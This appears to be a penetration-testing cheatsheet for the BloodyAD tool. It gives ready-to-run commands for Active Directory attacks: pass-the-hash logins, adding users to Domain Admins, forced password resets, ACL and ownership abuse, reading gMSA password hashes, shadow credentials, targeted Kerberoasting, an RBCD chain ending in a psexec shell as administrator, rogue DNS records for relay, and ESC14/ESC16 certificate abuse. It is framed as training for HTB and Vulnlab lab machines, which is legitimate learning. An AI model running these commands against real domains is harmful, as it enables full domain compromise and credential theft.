BloodyAD & Advanced Tooling
BloodyAD is a versatile Active Directory privilege escalation and post-exploitation tool. It communicates directly via LDAP, making it faster and stealthier than tools that rely on RPC or WMI. This cheatsheet covers every major operation with ready-to-use commands.
1. BloodyAD Overview
BloodyAD automates common AD attack operations that would otherwise require multiple tools (ldapmodify, PowerView, SharpAD, etc.). It is particularly useful for:
- ACL abuse (GenericAll, WriteOwner, WriteDACL)
- Object attribute modification (SPN, UPN, delegation flags)
- Shadow Credentials attacks
- RBCD configuration
- gMSA password reading
- Machine account manipulation
- DNS record management
When to use BloodyAD over other tools:
| Scenario | BloodyAD | Alternative |
|---|---|---|
| ACL abuse from Linux | Best choice | PowerView (Windows only) |
| Shadow Credentials | Works, simpler syntax | pywhisker |
| RBCD setup | One command | impacket-rbcd |
| gMSA password reading | Built-in | gMSADumper, nxc |
| SPN manipulation | Built-in | targetedKerberoast |
| DNS record creation | Built-in | dnstool.py |
| Pass-the-hash operations | Native support (-p :<hash>) | Most tools support PTH |
2. Authentication Options
BloodyAD supports three authentication methods. All commands in this cheatsheet use the placeholder format -- replace with your actual values.
Password Authentication
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASSWORD' <command>
Pass-the-Hash
Use the -p :<hash> format (colon prefix before the NT hash).
bloodyAD --host DC_IP -d DOMAIN -u USER -p ':NTHASH' <command>
Tip: The colon before the hash is mandatory. Without it, BloodyAD treats the hash as a literal password.
Kerberos Authentication
bloodyAD --host DC_IP -d DOMAIN -u USER -k <command>
You can specify the hash format with -f:
bloodyAD --host DC_IP -d DOMAIN -u USER -p ':NTHASH' -f rc4 <command>
3. Information Gathering
Get Object Properties
Retrieve all properties of an AD object (user, computer, group).
# Full object dump
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get object TARGET_USER
# Specific attribute
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get object TARGET_USER --attr userPrincipalName
# Get group membership
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get object TARGET_USER --attr memberOf
Get Children Objects
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get children 'OU=Users,DC=domain,DC=local'
Find Writable Attributes
Identify which attributes you can modify on objects -- critical for finding attack paths.
# Find all writable attributes
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get writable --detail
Search Operations
# General search (use -h to see all search options)
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get search -h
# Search with extended controls (e.g., show tombstoned/deleted objects)
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' -k get search \
-c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065
4. User Operations
Add User to Group
When you have GenericAll, GenericWrite, or WriteProperty on a group, add yourself or another user as a member.
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add groupMember 'Domain Admins' TARGET_USER
Change Password
Requires GenericAll or ResetPassword on the target user.
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set password TARGET_USER 'NewPassword123!'
Enable a Disabled Account
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' remove uac TARGET_USER -f ACCOUNTDISABLE
Disable an Account
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add uac TARGET_USER -f ACCOUNTDISABLE
5. ACL Abuse with BloodyAD
GenericAll
Grant full control over a target object. Use this when you have WriteDACL on the target.
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add genericAll \
'CN=TARGET_USER,CN=Users,DC=domain,DC=local' ATTACKER_USER
Tip: GenericAll on a group object controls the group itself (add/remove members, change properties) but does NOT grant GenericAll on the group's members. These are separate permissions.
WriteOwner
Take ownership of an object. Once you own it, you can grant yourself any permissions.
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set owner TARGET_GROUP ATTACKER_USER
After becoming owner, grant yourself GenericAll:
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add genericAll \
'CN=TARGET_GROUP,CN=Users,DC=domain,DC=local' ATTACKER_USER
WriteDACL
When you have WriteDACL, add any ACE you need.
# Grant GenericAll via WriteDACL
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add genericAll \
'CN=TARGET,CN=Users,DC=domain,DC=local' ATTACKER_USER
6. gMSA Password Reading
Group Managed Service Accounts (gMSA) have auto-rotating passwords stored in the msDS-ManagedPassword attribute. If your user is in the PrincipalsAllowedToRetrieveManagedPassword list, you can read it.
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get object 'GMSA_ACCOUNT$' \
--attr msDS-ManagedPassword
The output contains the NT hash that can be used directly for pass-the-hash:
# Use the extracted hash
nxc smb DC_IP -u 'GMSA_ACCOUNT$' -H NTHASH
7. Machine Account Operations
Check MachineAccountQuota
The default MAQ is 10, allowing any domain user to create up to 10 computer accounts.
# Check current quota
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get object \
'DC=domain,DC=local' --attr ms-DS-MachineAccountQuota
Create a Machine Account
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add computer NEWPC$ 'ComputerPass123!'
Modify MachineAccountQuota
Requires write access to the domain root object.
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set object \
'DC=domain,DC=local' ms-DS-MachineAccountQuota -v 10
8. Shadow Credentials
Add a Key Credential to a target object's msDS-KeyCredentialLink attribute. This allows authentication as that object using certificate-based auth (PKINIT).
Prerequisites: ADCS enrolled or Key Trust model configured, target must be a user or computer.
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add shadowCredentials TARGET_USER
After adding the shadow credential, authenticate using the generated certificate:
# Use certipy or PKINITtools to get a TGT from the shadow credential
certipy auth -pfx shadow.pfx -dc-ip DC_IP
9. SPN Operations (WriteSPN)
Setting an SPN on a user account enables Kerberoasting. Use this when you have GenericAll or GenericWrite on a target user.
# Set an arbitrary SPN
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set object TARGET_USER \
servicePrincipalName -v 'HTTP/attacker.domain.local'
Then Kerberoast the target:
impacket-GetUserSPNs DOMAIN/USER:PASS -dc-ip DC_IP -request-user TARGET_USER
Clean up after cracking:
# Remove the SPN (if you have write access)
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set object TARGET_USER \
servicePrincipalName -v ''
Tip: WriteSPN is a common BloodHound edge. Always check if target users have Kerberos pre-authentication disabled -- if so, AS-REP roasting is simpler and does not require setting an SPN.
10. RBCD Configuration
Resource-Based Constrained Delegation allows a machine you control to impersonate any user to a target service.
Prerequisites: Write access to the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute + a computer account you control.
# Step 1: Create a machine account (if needed)
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add computer EVIL$ 'Pass123!'
# Step 2: Configure RBCD -- allow EVIL$ to delegate to TARGET$
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add rbcd 'TARGET$' 'EVIL$'
Then request a service ticket via S4U:
# Step 3: Get a service ticket impersonating administrator
impacket-getST -spn cifs/TARGET.domain.local -impersonate administrator \
-dc-ip DC_IP 'DOMAIN/EVIL$:Pass123!'
# Step 4: Use the ticket
export KRB5CCNAME=administrator@cifs_TARGET.domain.local@DOMAIN.LOCAL.ccache
impacket-psexec -k -no-pass TARGET.domain.local
11. DNS Record Management
Add DNS records pointing to your attacker IP. Useful for MITM attacks, NTLM relay, or redirecting traffic.
# Add a DNS A record
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add dnsRecord RECORD_NAME ATTACKER_IP
Tip: Any authenticated domain user can create DNS records by default (ADIDNS). This is useful for NTLM relay setups where you need victims to resolve a hostname to your IP.
12. UPN and Email Modification
Modify UserPrincipalName (UPN)
UPN modification is critical in attacks like ESC16 (ADCS) where you set a target's UPN before requesting a certificate.
# Set UPN
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set object TARGET_USER \
userPrincipalName -v 'administrator@domain.local'
# Verify the change
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get object TARGET_USER \
--attr userPrincipalName
Tip: For ESC16, always restore the original UPN after obtaining the certificate, before running
certipy auth. Failure to restore causes authentication to fail.
Modify Email Address
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set object TARGET_USER \
mail -v 'attacker@domain.local'
13. Delegation Flags
Add TRUSTED_TO_AUTH_FOR_DELEGATION
Enables constrained delegation with protocol transition (S4U2Self + S4U2Proxy).
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add uac TARGET_USER \
-f TRUSTED_TO_AUTH_FOR_DELEGATION
Add TRUSTED_FOR_DELEGATION (Unconstrained)
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add uac TARGET_COMPUTER \
-f TRUSTED_FOR_DELEGATION
Remove Delegation Flags
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' remove uac TARGET_USER \
-f TRUSTED_TO_AUTH_FOR_DELEGATION
14. altSecurityIdentities Modification
The altSecurityIdentities attribute maps certificates to AD objects. Modifying it enables certificate-based authentication abuse (ESC14).
# Set altSecurityIdentities for ESC14B
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set object TARGET_USER \
altSecurityIdentities -v 'X509:<RFC822>attacker@domain.local'
After modification, request a certificate with the matching email and authenticate as the target user.
15. Deleted Objects Recovery
BloodyAD can enumerate and restore deleted (tombstoned) AD objects, which may contain sensitive data or previously privileged accounts.
Find Deleted Objects
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get writable --include-del
Search Tombstoned Objects with Extended Controls
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' -k get search \
-c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065
Restore a Deleted Object
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' -k set restore TARGET_USER
Tip: Tombstoned objects retain most of their attributes (including group memberships) for the tombstone lifetime (default 180 days). Restoring a deleted admin account can be a quick path to domain admin.
16. Quick Reference Table
All commands use the base syntax: bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS'
| Operation | Command |
|---|---|
| Get object info | get object TARGET |
| Get specific attribute | get object TARGET --attr ATTR |
| Find writable attributes | get writable --detail |
| Add user to group | add groupMember GROUP USER |
| Change password | set password TARGET 'NEWPASS' |
| Enable disabled account | remove uac TARGET -f ACCOUNTDISABLE |
| Grant GenericAll | add genericAll DN TARGET |
| Set owner | set owner TARGET ATTACKER |
| Read gMSA password | get object 'GMSA$' --attr msDS-ManagedPassword |
| Create machine account | add computer NAME$ PASS |
| Check MAQ | get object 'DC=d,DC=l' --attr ms-DS-MachineAccountQuota |
| Add Shadow Credential | add shadowCredentials TARGET |
| Set SPN | set object TARGET servicePrincipalName -v 'SPN' |
| Configure RBCD | add rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$' |
| Add DNS record | add dnsRecord NAME IP |
| Modify UPN | set object TARGET userPrincipalName -v 'UPN' |
| Modify email | set object TARGET mail -v 'EMAIL' |
| Add delegation flag | add uac TARGET -f TRUSTED_TO_AUTH_FOR_DELEGATION |
| Remove delegation flag | remove uac TARGET -f FLAG |
| Set altSecurityIdentities | set object TARGET altSecurityIdentities -v 'VALUE' |
| Find deleted objects | get writable --include-del |
| Restore deleted object | set restore TARGET |
| Search with controls | get search -c OID |
Authentication Flags
| Flag | Purpose |
|---|---|
-p 'PASSWORD' | Password authentication |
-p ':NTHASH' | Pass-the-hash (colon prefix required) |
-k | Kerberos authentication |
-f rc4 | Specify hash format |
Complementary Tools
BloodyAD covers many operations, but some attacks require specialized tools. Here is when to reach for alternatives:
| Task | Tool | Notes |
|---|---|---|
| ADCS enumeration and exploitation | certipy | ESC1-ESC16, certificate auth |
| BloodHound data collection | bloodhound-python | Relationship mapping |
| SMB operations + spraying | nxc (netexec) | Broader protocol support |
| Kerberos attacks | impacket | GetUserSPNs, getST, getTGT |
| NTLM relay | impacket-ntlmrelayx | Relay to LDAP, SMB, MSSQL, HTTP |
| Coercion | PetitPotam, Coercer | Force authentication |
| WinRM shell | evil-winrm | Interactive PowerShell |
| LDAP queries | ldapsearch | Raw LDAP when BloodyAD is unavailable |
Machines to Practice
These HTB and Vulnlab machines feature heavy BloodyAD usage:
- Vintage (HTB) -- bloodyAD PTH, group manipulation
- Rebound (HTB) -- ACL abuse chain
- Certified (HTB) -- ADCS + ACL abuse
- TombWatcher (HTB) -- Shadow Credentials, delegation
- Absolute (HTB) -- Kerberos-only environment
- Redelegate (Vulnlab) -- Delegation attacks